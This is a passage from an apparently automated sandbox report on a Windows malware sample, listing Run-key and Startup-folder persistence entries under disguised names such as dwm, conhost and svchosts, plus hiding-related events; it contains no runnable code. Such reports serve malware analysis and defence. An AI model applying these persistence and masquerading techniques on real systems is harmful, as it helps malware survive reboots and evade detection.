                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scrJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scrJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN
                        Source: C:\Brokercrt\comReviewsession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iKSiRODBDWoPAMSDKBDQBFN

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00007FF76D5C6EA0
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
